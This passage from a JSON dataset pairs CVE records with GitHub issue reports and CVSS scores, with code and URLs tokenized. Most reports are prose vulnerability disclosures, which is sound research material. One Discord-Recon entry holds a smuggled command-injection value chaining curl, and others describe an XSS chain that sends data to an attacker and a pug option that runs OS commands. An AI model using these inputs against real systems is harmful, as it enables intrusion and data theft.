  62824. "description": "Block one more gadget type (shaded hikari config, CVE to be allocated) . (note: placeholder until verified/validated, fix provided) Another gadget type reported regarding a class of [TO BE ADDED]. See URLTAG for description of the general problem. Mitre id: [TO BE ALLOCATED] Reporters: threedr3am & LFY Fix will be included in:",
  62825. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  62826. "severity": "CRITICAL",
  62827. "baseScore": 9.8,
  62828. "impactScore": 5.9,
  62829. "exploitabilityScore": 3.9
  62830. },
  62831. {
  62832. "CVE_ID": "CVE-2020-9547",
  62833. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2634",
  62834. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2634",
  62835. "Repo_new": "fasterxml/jackson-databind",
  62836. "Issue_Created_At": "2020-03-01T01:02:31Z",
  62837. "description": "Block two more gadget types (ibatis sqlmap, anteros core; CVE to be allocated). note: placeholder until verified/validated, fix provided) Another NUMBERTAG gadget types reported regarding classes of [TO BE ADDED]. See URLTAG for description of the general problem. Mitre id: [TO BE ALLOCATED] Reporters: threedr3am & APITAG Fix will be included in:",
  62838. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  62839. "severity": "CRITICAL",
  62840. "baseScore": 9.8,
  62841. "impactScore": 5.9,
  62842. "exploitabilityScore": 3.9
  62843. },
  62844. {
  62845. "CVE_ID": "CVE-2020-9549",
  62846. "Issue_Url_old": "https://github.com/enferex/pdfresurrect/issues/8",
  62847. "Issue_Url_new": "https://github.com/enferex/pdfresurrect/issues/8",
  62848. "Repo_new": "enferex/pdfresurrect",
  62849. "Issue_Created_At": "2020-02-28T18:57:24Z",
  62850. "description": "Bug: Buffer Overflow into Out of Bounds Write. Description In NUMBERTAG and newer, the function APITAG in APITAG has the following logic: URLTAG If buf does not contain one of the expected terminating characters (whitespace, APITAG , APITAG ), c can point to an address outside buf , causing a APITAG byte to be written out of bounds. Example Instead of creating a APITAG I found a benign PDF that happens to trigger this bug: FILETAG (sha NUMBERTAG APITAG ) The problem occurs while parsing the following data: CODETAG Due to the reuse of buf between invocations of the function, buf will eventually contain: APITAG This benign example causes a read to segfault, but a more carefully crafted input could cause an out of bounds write. Valgrind ERRORTAG",
  62851. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  62852. "severity": "HIGH",
  62853. "baseScore": 7.8,
  62854. "impactScore": 5.9,
  62855. "exploitabilityScore": 1.8
  62856. },
  62857. {
  62858. "CVE_ID": "CVE-2021-20066",
  62859. "Issue_Url_old": "https://github.com/jsdom/jsdom/issues/3124",
  62860. "Issue_Url_new": "https://github.com/jsdom/jsdom/issues/3124",
  62861. "Repo_new": "jsdom/jsdom",
  62862. "Issue_Created_At": "2021-02-22T09:43:06Z",
  62863. "description": "CVETAG ] : APITAG improperly allows the loading of local resources. Basic info: FILETAG version NUMBERTAG jsdom version NUMBERTAG Minimal reproduction case From URLTAG _([ CVETAG CVETAG _ : > Synopsis > > APITAG improperly allows the loading of local resources. Modern browser best practices dictate that the loading of local resources should be disallowed by default. > > From documentation, APITAG does not, by default, load any subresources. Users must enable the loading of resources/subresources. For example, when creating a new JSDOM object, the resources item can be set to \"usable\" to allow the loading of external resources: APITAG > The issue here is that this setting also enables the loading of local resources. For example, the following code snippet verifies that JSDOM is attempting to access a local resource by using a non existent file to throw an error: CODETAG > Output when running the above: ERRORTAG",
  62864. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L",
  62865. "severity": "MEDIUM",
  62866. "baseScore": 5.6,
  62867. "impactScore": 3.4,
  62868. "exploitabilityScore": 2.2
  62869. },
  62870. {
  62871. "CVE_ID": "CVE-2021-20190",
  62872. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2854",
  62873. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2854",
  62874. "Repo_new": "fasterxml/jackson-databind",
  62875. "Issue_Created_At": "2020-09-16T15:32:43Z",
  62876. "description": "Block one more gadget type APITAG Another gadget type(s) has been reported but not yet verified regarding a class(es) of JDK Swing. See URLTAG for description of the general problem. Mitre id: [to be allocated] Reporter(s): Yangkun(ICSL) Fix (if one needed) would be included in NUMBERTAG Not considered valid CVE for Jackson NUMBERTAG and later (see URLTAG",
  62877. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  62878. "severity": "HIGH",
  62879. "baseScore": 8.1,
  62880. "impactScore": 5.9,
  62881. "exploitabilityScore": 2.2
  62882. },
  62883. {
  62884. "CVE_ID": "CVE-2021-20218",
  62885. "Issue_Url_old": "https://github.com/fabric8io/kubernetes-client/issues/2715",
  62886. "Issue_Url_new": "https://github.com/fabric8io/kubernetes-client/issues/2715",
  62887. "Repo_new": "fabric8io/kubernetes-client",
  62888. "Issue_Created_At": "2021-01-12T04:35:34Z",
  62889. "description": "Potential CVE?. A recently found vulnerability URLTAG was fixed in another project URLTAG similar to this one. It might potentially affect a similar implementation URLTAG in APITAG . Ironically, it prints out the normalized path URLTAG into stdout, but uses the original (potentially dangerous) path.",
  62890. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H",
  62891. "severity": "HIGH",
  62892. "baseScore": 7.4,
  62893. "impactScore": 5.2,
  62894. "exploitabilityScore": 2.2
  62895. },
  62896. {
  62897. "CVE_ID": "CVE-2021-20245",
  62898. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/3176",
  62899. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/3176",
  62900. "Repo_new": "imagemagick/imagemagick",
  62901. "Issue_Created_At": "2021-02-02T06:03:44Z",
  62902. "description": "Division by zero in APITAG in coders/webp.c . When APITAG was set to zero, a division by zero error would happen in line NUMBERTAG So a crafted file may trigger undefined behavior in the form of division by zero. Maybe there needs to be a APITAG to do the division in line NUMBERTAG URLTAG",
  62903. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  62904. "severity": "MEDIUM",
  62905. "baseScore": 5.5,
  62906. "impactScore": 3.6,
  62907. "exploitabilityScore": 1.8
  62908. },
  62909. {
  62910. "CVE_ID": "CVE-2021-20285",
  62911. "Issue_Url_old": "https://github.com/upx/upx/issues/421",
  62912. "Issue_Url_new": "https://github.com/upx/upx/issues/421",
  62913. "Repo_new": "upx/upx",
  62914. "Issue_Created_At": "2020-11-12T12:39:35Z",
  62915. "description": "APITAG APITAG APITAG What's the problem (or question)? An issue was discovered in up NUMBERTAG devel branch), There is an illegal memory access in function APITAG at APITAG I also check the newest release version meet the same crash, lies at APITAG What should have happened? no illegal memory access (crash) Do you have an idea for a solution? check the relocation_offset and do not access the illegal memory How can we reproduce the issue NUMBERTAG Compile the devel branch with sanitize open APITAG NUMBERTAG Use APITAG and get crash download the poc URLTAG here. source ERRORTAG the source code didn't check the rel_off so get an illegal rp debug FILETAG bug report ERRORTAG Please tell us details about your environment. UPX version used (both APITAG and APITAG ): Host Operating System and version: ubuntu NUMBERTAG Host CPU architecture: Intel(R) Core(TM) i NUMBERTAG H CPU NUMBERTAG GHz Target Operating System and version: ubuntu NUMBERTAG Target CPU architecture: Intel(R) Core(TM) i NUMBERTAG H CPU NUMBERTAG GHz",
  62916. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:H",
  62917. "severity": "MEDIUM",
  62918. "baseScore": 6.6,
  62919. "impactScore": 4.7,
  62920. "exploitabilityScore": 1.8
  62921. },
  62922. {
  62923. "CVE_ID": "CVE-2021-20308",
  62924. "Issue_Url_old": "https://github.com/michaelrsweet/htmldoc/issues/423",
  62925. "Issue_Url_new": "https://github.com/michaelrsweet/htmldoc/issues/423",
  62926. "Repo_new": "michaelrsweet/htmldoc",
  62927. "Issue_Created_At": "2021-03-21T13:11:39Z",
  62928. "description": "Bug: buffer overflow caused by integer overflow in APITAG Hi, I found some integer overflow vulnerability that is similar to CVETAG URLTAG in htmldoc. os : Debian APITAG bullseye/sid version NUMBERTAG FILETAG In htmldoc poc, there are maliciously crafted gif and html file which crashes htmldoc like below. APITAG The vulnerability resides in APITAG function in htmldoc/image.cxx file. In line NUMBERTAG the program reads data from given gif file using fread NUMBERTAG fread(buf NUMBERTAG fp); Then, it stores value to 'img >width' and 'img >height' in line NUMBERTAG and 'img >depth' is determined by whether given image is grayscale NUMBERTAG img >width = (buf NUMBERTAG APITAG height = (buf NUMBERTAG APITAG depth = gray NUMBERTAG If load_data is equal to NUMBERTAG and, 'img >width' and 'img >height' are enough large to cause an integer overflow, the small heap block is allocated in line NUMBERTAG It leads to buffer overrun when reads data to this buffer in APITAG NUMBERTAG if (!load_data NUMBERTAG return NUMBERTAG img >pixels = (uchar )malloc((size_t)(img >width img >height img >depth));",
  62929. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  62930. "severity": "CRITICAL",
  62931. "baseScore": 9.8,
  62932. "impactScore": 5.9,
  62933. "exploitabilityScore": 3.9
  62934. },
  62935. {
  62936. "CVE_ID": "CVE-2021-21259",
  62937. "Issue_Url_old": "https://github.com/hackmdio/codimd/issues/1648",
  62938. "Issue_Url_new": "https://github.com/hackmdio/codimd/issues/1648",
  62939. "Repo_new": "hackmdio/codimd",
  62940. "Issue_Created_At": "2021-01-13T11:01:12Z",
  62941. "description": "Stored XSS in slide mode (via reveal markdown). There is a (quite convoluted) stored XSS vulnerability in the slides feature: The presentation's YAML options allow specifying APITAG files as dependencies. Any JS file specified by the dependency option is loaded and executed (when viewed via the presentation mode, APITAG ), subject to the server's CSP and their Content Type header We can use JSONP endpoints that bypass the CSP (e.g. on Vimeo or Slideshare, or on Disqus with a free API key) to run arbitrary existing JS functions _without arguments_ We use APITAG followed by APITAG to inject HTML from a div element with a APITAG attribute in the speaker notes into the DOM. The slide navigation is necessary to ensure that the speaker notes are outside of the DOM of the original slide before the second request comes in (duplicate calls to APITAG break the proof of concept). Usually, the included markdown would be enclosed in a APITAG tag to ensure that nothing can escape into the DOM. However, APITAG does not properly escape APITAG tags (the check is case sensitive, but should at the very least be case insensitive): CODETAG Actual JS in this DOM injection will never be loaded, because it is assigned via APITAG , but because the CSP includes so many different embed features, we can load FILETAG from Disqus (it is used on the Disqus login page, fairly easy to find) that walks the entire DOM and renders APITAG template strings. From the template, we can simply grab another script from anywhere (including another note) and eval it. 
A full proof of concept implementation can be found here URLTAG : The main note ( APITAG ) is responsible for loading the templating JS (and the old APITAG version that it requires) from Disqus, and issuing the two JSONP calls that lead to the DOM injection The APITAG note contains the content that is injected into the DOM, and loads and executes the final payload The APITAG script is the final XSS payload (here, because this was for hxp NUMBERTAG CTF's hackme challenge URLTAG it simply grabs the contents of the APITAG page and sends it to the attacker, but you can just as easily run any other APITAG code). The APITAG script automates the upload process and automatically reports the XSS page (the slides of APITAG in presentation mode) to the challenge admin, which isn't really relevant here. The most straightforward way to mitigate this is to fix the DOM injection in APITAG by modifying the check for APITAG to cover everything that browsers use to end a APITAG tag. I also wonder what value the dependency YAML option really brings to the slides feature it is restricted to loading JS from pages listed in the CSP anyways, so it would probably be better to just load scripts related to e.g. video embeds as needed (just as in \"normal\" markdown mode), and discard the option otherwise. Note that while the CTF challenge was using a (slightly modified, to fix some but given some of the solutions, apparently not all dependencies with known CVEs) APITAG NUMBERTAG this exploit still works against the official NUMBERTAG release, and FILETAG ( source URLTAG .",
  62942. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  62943. "severity": "MEDIUM",
  62944. "baseScore": 6.1,
  62945. "impactScore": 2.7,
  62946. "exploitabilityScore": 2.8
  62947. },
  62948. {
  62949. "CVE_ID": "CVE-2021-21306",
  62950. "Issue_Url_old": "https://github.com/markedjs/marked/issues/1927",
  62951. "Issue_Url_new": "https://github.com/markedjs/marked/issues/1927",
  62952. "Repo_new": "markedjs/marked",
  62953. "Issue_Created_At": "2021-02-05T01:36:23Z",
  62954. "description": "Groups of consecutive underscores in a specific pattern hang/take a long time to convert. Marked version NUMBERTAG Describe the bug NUMBERTAG or more groups of odd- and even-numbered consecutive underscores followed by a character take a very long time to convert. Example input: APITAG If you click on the Marked Demo link below, you will see that this takes a long time to convert (approximately NUMBERTAG minutes). The input above is NUMBERTAG underscores NUMBERTAG underscores NUMBERTAG underscores, and an a . Modifying the input in a number of ways changes the conversion time to APITAG NUMBERTAG FILETAG NUMBERTAG APITAG Demo URLTAG Expected behavior The markdown to html conversion should take roughly the same amount of time as it does when the above example input is modified in one of the ways described above (i.e NUMBERTAG ms).",
  62955. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  62956. "severity": "HIGH",
  62957. "baseScore": 7.5,
  62958. "impactScore": 3.6,
  62959. "exploitabilityScore": 3.9
  62960. },
  62961. {
  62962. "CVE_ID": "CVE-2021-21323",
  62963. "Issue_Url_old": "https://github.com/brave/brave-browser/issues/13527",
  62964. "Issue_Url_new": "https://github.com/brave/brave-browser/issues/13527",
  62965. "Repo_new": "brave/brave-browser",
  62966. "Issue_Created_At": "2021-01-12T23:53:28Z",
  62967. "description": "[hackerone] Tor DNS issue. URLTAG related NUMBERTAG It appears this was a known issue at least in the muon days; it is unclear whether it was ever fixed in brave core. URLTAG suggests that DNS prefetching may be the only source of this leak (DNS lookups escaping the Tor circuit), and supposedly this can be disabled via the 'preload pages' setting in PATHTAG",
  62968. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  62969. "severity": "MEDIUM",
  62970. "baseScore": 5.3,
  62971. "impactScore": 1.4,
  62972. "exploitabilityScore": 3.9
  62973. },
  62974. {
  62975. "CVE_ID": "CVE-2021-21353",
  62976. "Issue_Url_old": "https://github.com/pugjs/pug/issues/3312",
  62977. "Issue_Url_new": "https://github.com/pugjs/pug/issues/3312",
  62978. "Repo_new": "pugjs/pug",
  62979. "Issue_Created_At": "2021-02-10T06:17:12Z",
  62980. "description": "Code injection vulnerability in APITAG and APITAG through \"pretty\" option. Hello, I found that pug may allow an attacker to inject arbitrary javascript code if an attacker can control APITAG . Pug Version NUMBERTAG Proof of concept Here is an vulnerable example including NUMBERTAG files: FILETAG and index.pug . In the example, there is only one variable \"pretty\" that is controlled by user, and the variable is not used in any dangerous functions. FILETAG ERRORTAG views/index.pug APITAG But if we visit URL below, it would lead to execute OS command \"whoami\". APITAG Detail This section will point the location of vulnerability and explain why I assume it's an issue. First of all, when Compiler object is initialized, APITAG would be saved in APITAG . URLTAG The APITAG function is simple, APITAG is pushed into APITAG array which stores the compiled code of template without any sanitization. APITAG URLTAG The APITAG is basically same as APITAG , APITAG is pushed without any sanitization at line NUMBERTAG APITAG : URLTAG If we look at how other functions handle options variables, we can see that they are all sanitized by stringify. ( APITAG is implemented with APITAG and APITAG always sanitizes variable with stringify. ) with APITAG : URLTAG with APITAG : URLTAG with stringify : URLTAG APITAG The APITAG and APITAG are the only two functions I found that are missing sanitization. I think it may be an issue.",
  62981. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
  62982. "severity": "CRITICAL",
  62983. "baseScore": 9.0,
  62984. "impactScore": 6.0,
  62985. "exploitabilityScore": 2.2
  62986. },
  62987. {
  62988. "CVE_ID": "CVE-2021-21361",
  62989. "Issue_Url_old": "https://github.com/bmuschko/gradle-vagrant-plugin/issues/19",
  62990. "Issue_Url_new": "https://github.com/bmuschko/gradle-vagrant-plugin/issues/19",
  62991. "Repo_new": "bmuschko/gradle-vagrant-plugin",
  62992. "Issue_Created_At": "2021-02-15T18:01:12Z",
  62993. "description": "Potential credentials leak when setting APITAG Problem Currently if APITAG is set, this will cause the whole environment of the Gradle process URLTAG to be inherited by the vagrant command. This is then printed at info level to the console log URLTAG . Context A common pattern for injecting credentials into the build process on build servers is to set them as environment variables on the build tool process. This way e.g. the credentials for deploying to Maven Central can be passed to the Gradle tasks that need them. So when my build executes a Vagrant task that has some environment variables set and also reads some credentials from the environment, this may leak the credentials to build scans and the build server log. Options Remove envp from console output. Log at debug level: this will prevent the output from showing up in build scans. It will not prevent the output from ending up in build server logs if Gradle is configured to log at debug level. Add a verbose configuration flag to control whether or not the command and environment should be printed to the log. It should default to false .",
  62994. "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  62995. "severity": "MEDIUM",
  62996. "baseScore": 6.5,
  62997. "impactScore": 3.6,
  62998. "exploitabilityScore": 2.8
  62999. },
  63000. {
  63001. "CVE_ID": "CVE-2021-21401",
  63002. "Issue_Url_old": "https://github.com/nanopb/nanopb/issues/647",
  63003. "Issue_Url_new": "https://github.com/nanopb/nanopb/issues/647",
  63004. "Repo_new": "nanopb/nanopb",
  63005. "Issue_Created_At": "2021-03-20T00:14:28Z",
  63006. "description": "Ill formed oneof message leads to calling free on an arbitrary pointer. This affects APITAG (and probably lower versions, though I haven't checked) with APITAG enabled. Specially crafted bytes can make APITAG eventually call APITAG on an arbitrary pointer. Here's the smallest repro case I could make: ERRORTAG Running this leads to: ERRORTAG I can repro this on both Linux and Mac. What I believe happens is: the first two bytes are interpreted as APITAG and result in APITAG URLTAG being set to APITAG URLTAG ; the third byte is interpreted as a field tag referring to APITAG . Because there are no more bytes in the input, decoding the field fails (with APITAG ). However, the current field is reset to APITAG from APITAG while APITAG is not cleared and is still set to APITAG ; seeing that decoding failed, APITAG tries to release the message. APITAG , thinking that the current field is APITAG , considers the contents of APITAG to refer to a dynamically allocated array and calls APITAG on it URLTAG . I'm not sure what the right fix would be perhaps APITAG should be set to null when oneof fields are switched, or perhaps the current field should not be changed until it is successfully parsed? Note that this is a potential security issue. I presume that if the first field was an integer, an arbitrary value could be written to it which would then be interpreted as an address and passed to free . Note: this was found by OSS Fuzz on Firestore (note that I have trimmed down the repro case from the original).",
  63007. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L",
  63008. "severity": "HIGH",
  63009. "baseScore": 7.1,
  63010. "impactScore": 4.2,
  63011. "exploitabilityScore": 2.8
  63012. },
  63013. {
  63014. "CVE_ID": "CVE-2021-21417",
  63015. "Issue_Url_old": "https://github.com/FluidSynth/fluidsynth/issues/808",
  63016. "Issue_Url_new": "https://github.com/fluidsynth/fluidsynth/issues/808",
  63017. "Repo_new": "fluidsynth/fluidsynth",
  63018. "Issue_Created_At": "2021-03-14T06:33:16Z",
  63019. "description": "fluidsynth crashes when loading a malformed sf2 file. version: APITAG APITAG APITAG .... URLTAG It says APITAG is the last gen, and then sets level to NUMBERTAG and breaks. CODETAG But if a malformed sf2 doesn't contain APITAG it will finally go to here: URLTAG CODETAG and it will be freed again (a double free) at: URLTAG APITAG APITAG > APITAG > APITAG > APITAG > APITAG > APITAG Here is an example that triggers this vuln. FILETAG FILETAG FILETAG Programs like VLC that use this library are affected by this vulnerability: FILETAG",
  63020. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  63021. "severity": "MEDIUM",
  63022. "baseScore": 5.5,
  63023. "impactScore": 3.6,
  63024. "exploitabilityScore": 1.8
  63025. },
  63026. {
  63027. "CVE_ID": "CVE-2021-21422",
  63028. "Issue_Url_old": "https://github.com/mongo-express/mongo-express/issues/577",
  63029. "Issue_Url_new": "https://github.com/mongo-express/mongo-express/issues/577",
  63030. "Repo_new": "mongo-express/mongo-express",
  63031. "Issue_Created_At": "2020-05-30T09:14:49Z",
  63032. "description": "HTML in String fields is not escaped. Version: docker image latest (as of NUMBERTAG Docker Image mongo APITAG I use a APITAG collection to save HTML documents in a string property of documents and use mongo express to access the Mongo Database. Especially when the properties with the HTML content are not loaded directly because of their size and I click on APITAG the HTML content is loaded and rendered by the browser (i.e. the stored markup is injected into the page unescaped). If you need further information please feel free to ask, I'll try to answer as fast as possible. Here are some screenshots from my browser: The screenshots are from the complete page so they are really long but I think they demonstrate the problem quite well. Normal View: FILETAG Opened a first HTML content attribute by clicking on APITAG Property\": FILETAG Opened a second HTML content attribute FILETAG Opened multiple HTML content attributes: FILETAG",
  63033. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  63034. "severity": "MEDIUM",
  63035. "baseScore": 6.1,
  63036. "impactScore": 2.7,
  63037. "exploitabilityScore": 2.8
  63038. },
  63039. {
  63040. "CVE_ID": "CVE-2021-21433",
  63041. "Issue_Url_old": "https://github.com/DEMON1A/Discord-Recon/issues/6",
  63042. "Issue_Url_new": "https://github.com/demon1a/discord-recon/issues/6",
  63043. "Repo_new": "demon1a/discord-recon",
  63044. "Issue_Created_At": "2021-02-25T10:26:02Z",
  63045. "description": "Blind RCE \u0641\u0633\u064a\u0631\u0641\u0631\u0643 \u064a\u0627 \u0628\u064a\u0629. \u0639\u0634\u0627\u0646 \u0627\u0646\u062a\u0627 \u0627\u062e\u0648\u064a\u0627 \u0636\u064a\u0641 \u0627\u0644\u0631\u0627\u062c\u0644 \u0627\u0644\u062c\u062f\u0639 \u0645\u062d\u0628\u062a\u0634 \u0627\u0647\u0646\u0643\u0631\u0643 .dirsearch anything&&curl FILETAG .anytool anything&&curl FILETAG APITAG Kind Regards, APITAG",
  63046. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  63047. "severity": "HIGH",
  63048. "baseScore": 8.8,
  63049. "impactScore": 5.9,
  63050. "exploitabilityScore": 2.8
  63051. },
  63052. {
  63053. "CVE_ID": "CVE-2021-21979",
  63054. "Issue_Url_old": "https://github.com/bitnami/bitnami-docker-laravel/issues/139",
  63055. "Issue_Url_new": "https://github.com/bitnami/bitnami-docker-laravel/issues/139",
  63056. "Repo_new": "bitnami/bitnami-docker-laravel",
  63057. "Issue_Created_At": "2021-03-02T19:09:25Z",
  63058. "description": "Laravel APP_KEY is fixed in docker image bitnami/laravel. Description The file PATHTAG is generated at the time that the docker image bitnami/laravel was built, and the value of APP_KEY is fixed under certain conditions. Although the APP_KEY is generated randomly each time we install laravel: APITAG if we build it as a docker image, the APP_KEY is a fixed value whenever we run it, so every container started from the image shares the same key. This value is crucial for the security of the application and must be randomly generated per Laravel installation. An attacker would be able to perform a deserialization attack, for instance using a Laravel vulnerability CVETAG URLTAG . If your application's encryption key is in the hands of a malicious party, that party could craft cookie values using the encryption key and exploit vulnerabilities inherent to PHP object serialization / unserialization, such as calling arbitrary class methods within your application. Fix The entrypoint now regenerates the APP_KEY if the app is not mounted and is copied from the default one. This issue was reported by LEI WANG URLTAG on February the NUMBERTAG rd and it was fixed on February the NUMBERTAG th. The following container images have been released with the fix: NUMBERTAG debian NUMBERTAG r NUMBERTAG or newer NUMBERTAG debian NUMBERTAG r NUMBERTAG or newer NUMBERTAG debian NUMBERTAG r0 or newer",
  63059. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
  63060. "severity": "HIGH",
  63061. "baseScore": 7.3,
  63062. "impactScore": 3.4,
  63063. "exploitabilityScore": 3.9
  63064. },
  63065. {
  63066. "CVE_ID": "CVE-2021-22563",
  63067. "Issue_Url_old": "https://github.com/libjxl/libjxl/issues/735",
  63068. "Issue_Url_new": "https://github.com/libjxl/libjxl/issues/735",
  63069. "Repo_new": "libjxl/libjxl",
  63070. "Issue_Created_At": "2021-10-14T20:01:32Z",
  63071. "description": "splines: segfault due to out of bounds access of segment array. Hello, this NUMBERTAG byte JPEG XL image, found via fuzz testing, causes a segfault during decoding (using the latest commit on the main branch). FILETAG ERRORTAG It looks like, when drawing spline segments, APITAG for this image contains NUMBERTAG entries but APITAG can return higher values for y that result in APITAG reading beyond the end of this. URLTAG The following patch to APITAG demonstrates a possible guard to prevent the segfault, but there's almost certainly a better way to fix this. CODETAG",
  63072. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
  63073. "severity": "MEDIUM",
  63074. "baseScore": 4.4,
  63075. "impactScore": 2.5,
  63076. "exploitabilityScore": 1.8
  63077. },
  63078. {
  63079. "CVE_ID": "CVE-2021-22873",
  63080. "Issue_Url_old": "https://github.com/revive-adserver/revive-adserver/issues/1068",
  63081. "Issue_Url_new": "https://github.com/revive-adserver/revive-adserver/issues/1068",
  63082. "Repo_new": "revive-adserver/revive-adserver",
  63083. "Issue_Created_At": "2019-06-24T06:42:33Z",
  63084. "description": "open redirect (oadest url) FILETAG revive NUMBERTAG dear all, we've found a bug in our revive about FILETAG (oadest) FILETAG > it will redirect to the URL given as destination. We read this URL FILETAG saying that we should upgrade the version, but this bug (as we think it is a bug) still allows an open redirect. This issue will harm our site, and the victims could be redirected to a phishing website. Could you guide us on what we should do? Even after upgrading to version NUMBERTAG it still allows an open redirect",
  63085. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  63086. "severity": "MEDIUM",
  63087. "baseScore": 6.1,
  63088. "impactScore": 2.7,
  63089. "exploitabilityScore": 2.8
  63090. },
  63091. {
  63092. "CVE_ID": "CVE-2021-22877",
  63093. "Issue_Url_old": "https://github.com/nextcloud/server/issues/24600",
  63094. "Issue_Url_new": "https://github.com/nextcloud/server/issues/24600",
  63095. "Repo_new": "nextcloud/server",
  63096. "Issue_Created_At": "2020-12-07T21:33:05Z",
  63097. "description": "Wrong (malformed) external storage credentials saved in APITAG . APITAG Hello! I am using Nextcloud NUMBERTAG in docker with LDAP auth + external storage and with several external SMB mounts (all with \"credentials saved in database\" enabled). It seems that the credentials saved in the corrspondeing table ( APITAG ) are wrong and therefore all SMB shares are showing errors. When I initially add the external storage SMB mounts in the settings and then a user logs in the first time, the SMB shares work (with the correct login) which gets correctly saved in the DB. Afterwards I can find one single entry on the APITAG table However, when I (as an admin) navigate to: APITAG the APITAG table gets populated with all the users (and some random credentials) this also includes all users who wasn\u00b4t ever logged in in nextcloud. When the user logs in afterward the credentials entry is already there and does not get updated. Steps to reproduce NUMBERTAG Add external SMB mount with option \"credentials saved in database NUMBERTAG Manually check the MYSQL table APITAG it should be empty NUMBERTAG As an admin: navigate to ( APITAG NUMBERTAG Recheck the MYSQL table APITAG there is an entry for every user now NUMBERTAG Login as new user and try to access a SMB share access denied. Expected behaviour NUMBERTAG Do not populate the table APITAG on \"user list settings page NUMBERTAG If the current user credentials does not match the ones in the DB > update it Actual behaviour Tell us what happens instead Debugging results In the file APITAG : When I output the APITAG on each request I get two results: for the admin user listing all users on the settings page: there is a full browser page with binary crap printed. while logged in with the specific user it prints the actual loginame of that user Bugfix APITAG When I change APITAG : from APITAG to APITAG it works correctly. 
With thix change the credentials gets stored on every request and therefore the wrong (initialized) ones getting overwritten. Server configuration I am using this docker image (no modifications): URLTAG Operating system: Docker on Ubuntu NUMBERTAG LTS Web server: nginx with php fpm Database: mariadb NUMBERTAG as docker container PHP version NUMBERTAG php NUMBERTAG Nextcloud version NUMBERTAG Updated from an older APITAG or fresh install: updated from nextcloud NUMBERTAG in one go) Where did you install Nextcloud from: Signing status: APITAG APITAG status APITAG ERRORTAG APITAG List of activated apps: APITAG APITAG list APITAG Enabled: accessibility NUMBERTAG activity NUMBERTAG cloud_federation_api NUMBERTAG comments NUMBERTAG da NUMBERTAG drawio NUMBERTAG external NUMBERTAG extract NUMBERTAG federatedfilesharing NUMBERTAG federation NUMBERTAG files NUMBERTAG files_external NUMBERTAG files_linkeditor NUMBERTAG files_pdfviewer NUMBERTAG files_rightclick NUMBERTAG files_sharing NUMBERTAG files_trashbin NUMBERTAG files_versions NUMBERTAG files_videoplayer NUMBERTAG logreader NUMBERTAG lookup_server_connector NUMBERTAG metadata NUMBERTAG notifications NUMBERTAG oauth NUMBERTAG photos NUMBERTAG provisioning_api NUMBERTAG ransomware_protection NUMBERTAG settings NUMBERTAG sharebymail NUMBERTAG socialsharing_email NUMBERTAG text NUMBERTAG theming NUMBERTAG theming_customcss NUMBERTAG twofactor_backupcodes NUMBERTAG APITAG NUMBERTAG twofactor_totp NUMBERTAG twofactor_u2f NUMBERTAG updatenotification NUMBERTAG user_ldap NUMBERTAG iewer NUMBERTAG workflowengine NUMBERTAG Disabled: admin_audit contactsinteraction dashboard encryption firstrunwizard nextcloud_announcements password_policy privacy recommendations serverinfo spreed support survey_client systemtags user_status weather_status APITAG Nextcloud configuration: APITAG APITAG report APITAG ERRORTAG APITAG Are you using external storage, if yes which one: SMB Are you using encryption: no encryption at rest Are you using 
an external user backend, if yes which one: LDAP LDAP configuration (delete this part if not used) APITAG APITAG LDAP config APITAG ERRORTAG APITAG Client configuration Browser: Chromoum NUMBERTAG Operating system: APITAG NUMBERTAG Logs In the nextcloud log section you can find the log of the initial user login who gets \"denied\" on the SMB storage due to wrong stored credentials. Nextcloud log APITAG APITAG APITAG log APITAG APITAG NUMBERTAG APITAG app in ERRORTAG request for / ERRORTAG sensitive parameter replaced PATHTAG PATHTAG PATHTAG sensitive parameter replaced \",\" sensitive parameter replaced PATHTAG sensitive parameters replaced PATHTAG sensitive parameters replaced PATHTAG sensitive parameter replaced ERRORTAG while getting file APITAG APITAG Intel Mac OS NUMBERTAG APITAG (KHTML, like Gecko) APITAG APITAG APITAG NUMBERTAG APITAG app in ERRORTAG request for / ERRORTAG sensitive parameter replaced PATHTAG PATHTAG PATHTAG sensitive parameter replaced \",\" sensitive parameter replaced PATHTAG sensitive parameters replaced PATHTAG sensitive parameters replaced PATHTAG sensitive parameter replaced 